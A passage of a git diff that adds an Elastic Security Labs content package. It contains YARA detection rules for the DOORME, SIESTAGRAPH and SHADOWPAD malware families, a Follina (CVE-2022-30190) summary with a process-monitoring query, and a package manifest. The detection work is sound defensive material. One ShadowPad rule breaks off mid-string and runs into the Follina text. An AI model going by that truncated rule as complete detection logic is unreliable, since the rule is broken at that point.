}\n $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }\n $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }\n $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }\n $str_0 = \".?AVDoorme@@\" ascii fullword\n condition:\n 3 of ($seq*) or 1 of ($str*)\n}\n```\n\n#### The SIESTAGRAPH implant\n\n```\nrule Windows_Trojan_SiestaGraph {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-14\"\n last_modified = \"2022-12-15\"\n os = \"windows\"\n arch_context = \"x86\"\n category_type = “Trojan”\n family = “SiestaGraph”\n threat_name = \"Windows.Trojan.SiestaGraph\"\n license = \"Elastic License v2\"\n strings:\n $a1 = \"downloadAsync\" ascii nocase fullword\n $a2 = \"UploadxAsync\" ascii nocase fullword\n $a3 = \"GetAllDriveRootChildren\" ascii fullword\n $a4 = \"GetDriveRoot\" ascii fullword\n $a5 = \"sendsession\" wide fullword\n $b1 = \"ListDrives\" wide fullword\n $b2 = \"Del OK\" wide fullword\n $b3 = \"createEmailDraft\" ascii fullword\n $b4 = \"delMail\" ascii fullword\n condition:\n all of ($a*) and 2 of ($b*)\n}\n```\n\n#### The SHADOWPAD malware family\n\n```\nrule Windows_Trojan_ShadowPad_1 {\n\tmeta:\n\t\tauthor = \"Elastic Security\"\n\t\tcreation_date = \"2023-01-23\"\n\t\tlast_modified = \"2023-01-31\"\n\t\tdescription = \"Target SHADOWPAD obfuscation loader+payload\"\n\t\tos = \"Windows\"\n\t\tarch = \"x86\"\n\t\tcategory_type = \"Trojan\"\n\t\tfamily = \"ShadowPad\"\n\t\tthreat_name = \"Windows.Trojan.ShadowPad\"\n\t\tlicense = \"Elastic License v2\"\n\tstrings:\n\t\t$a1 = { 87 0? 24 0F 8? }\n\t\t$a2 = { 9C 0F 8? }\n\t\t$a3 = { 03 0? 0F 8? }\n\t\t$a4 = { 9D 0F 8? }\n\t\t$a5 = { 87 0? 24 0F 8? }\n\tcondition:\n\t\tall of them\n}\nrule Windows_Trojan_Shadowpad_2 {\n\tmeta:\n\t\tauthor = \"Elastic Security\"\n\t\tcreation_date = \"2023-01-31\"\n\t\tlast_modified = \"2023-01-31\"\n\t\tdescription = \"Target SHADOWPAD loader\"\n\t\tos = \"Windows\"\n\t\tarch = \"x86\"\n\t\tcategory_type = \"Trojan\"\n\t\tfamily = \"Shadowpad\"\n\t\tthreat_name = \"Windows.Trojan.Shadowpad\"\n\t\tlicense = \"Elastic License v2\"\n\tstrings:\n\t\t$a1 = \"{%8.8x-%4.4x-%4.4x-%8.8x%8.8x}\"\n\tcondition:\n\t\tall of them\n}\nrule Windows_Trojan_Shadowpad_3 {\n\tmeta:\n\t\tauthor = \"Elastic Security\"\n\t\tcreation_date = \"2023-01-31\"\n\t\tlast_modified = \"2023-01-31\"\n\t\tdescription = \"Target SHADOWPAD payload\"\n\t\tos = \"Windows\"\n\t\tarch = \"x86\"\n\t\tcategory_type = \"Trojan\"\n\t\tfamily = \"Shadowpad\"\n\t\tthreat_name = \"Windows.Trojan.Shadowpad\"\n\t\tlicense = \"Elastic License v2\"\n\tstrings:\n\t\t$a1 = \"hH#whH#w\" fullword\n\t\t$a2 = \"Yuv~YuvsYuvhYuv]YuvRYuvGYuv1:tvdisclosure](https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/).\n\n## Summary\n\nReaders may [recall](https://www.elastic.co/blog/playing-defense-against-gamaredon-group) that template injection is an [established](https://attack.mitre.org/techniques/T1221/) technique enabling an attacker to remotely load malicious content when a document is opened by a relevant application. This vulnerability — dubbed “[Follina](https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e)” — works in conjunction with template injection, specifically when the remote template uses the ms-msdt URI handler. Importantly, it does not require macros to be enabled. As in other cases of template injection, readers should be aware that remote objects may be heavily obfuscated.\n\nSecurity teams should monitor msdt.exe as a child process of WINWORD.exe and other applications, paying particular attention to command line arguments and network activity attributed to that child process. Security teams may also consider monitoring network activity from all MS Office applications and their descendants as one way of generically identifying initial exploitation attempts via weaponized documents.\n\nElastic is deploying a new malware signature to identify the use of ms-msdt URIs. This signature will be distributed via the Elastic Endpoint. The team has also issued an update to the “[Suspicious MS Office Child Process](https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_suspicious_ms_office_child_process.toml)” rule available via the [detection-rules repository](https://github.com/elastic/detection-rules), adding “msdt.exe” to the list of suspicious descendants and “Outlook.exe” to the list of relevant parent processes. The following query pertains to Elastic Endgame:\n\n```\nNetwork where process_name == “msdt.exe” and\ndescendant of [process where process_name == “winword.exe” ]\n| unique process_name, command_line\n```\n\n## References\n\nSeveral organizations have released information and resources related to this vulnerability (non-exhaustive):\n\n- Microsoft’s [guidance](https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/), outlining one method of disabling the MSDT URL protocol\n- Huntress has provided their [analysis](https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug) of the vulnerability with additional information about ms-msdt abuse Todyl has shared an [Elastic query ](https://twitter.com/brent_murphy/status/1531322468228399104?t=yX_zDYE4ew6gA4am6a75Ug&s=09)pertaining to process events\n\nKevin Beaumont has provided a [write-up](https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e) with historical and other details about potential implementations.\n"
+ },
+ "title": "Vulnerability summary: Follina, CVE-2022-30190",
+ "slug": "vulnerability-summary-follina",
+ "date": "2023-01-19",
+ "description": "Elastic is deploying a new malware signature to identify the use of the Follina vulnerability. Learn more in this post.",
+ "author": [
+ {
+ "slug": "devon-kerr"
+ }
+ ],
+ "image": "blog-security-detection-720x420.png",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ]
+ },
+ "id": "security_labs_content-vulnerability_summary_follina-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/manifest.yml b/packages/security_labs_content/manifest.yml
new file mode 100644
index 00000000000..776e1d9435c
--- /dev/null
+++ b/packages/security_labs_content/manifest.yml
@@ -0,0 +1,25 @@
+format_version: 3.3.5
+name: security_labs_content
+title: "Security Labs content"
+version: 0.0.1
+source:
+ license: "Elastic-2.0"
+description: "Package containing the Security Labs content from https://www.elastic.co/security-labs."
+type: content
+categories:
+ - security
+conditions:
+ elastic:
+ capabilities:
+ - security
+ subscription: "basic"
+ kibana:
+ version: "^8.19.0 || ^9.1.0"
+icons:
+ - size: 16x16
+ src: /img/security-logo-color-64px.svg
+ title: Security logo
+ type: image/svg+xml
+owner:
+ github: elastic/security-generative-ai
+ type: elastic